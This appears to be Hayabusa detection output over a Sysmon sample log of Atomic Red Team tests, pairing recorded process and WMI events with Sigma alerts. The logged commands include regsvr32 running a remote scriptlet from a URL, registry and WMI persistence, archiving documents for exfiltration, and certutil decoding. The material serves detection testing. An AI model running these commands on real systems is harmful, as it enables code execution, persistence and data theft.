+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,../hayabusa-rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
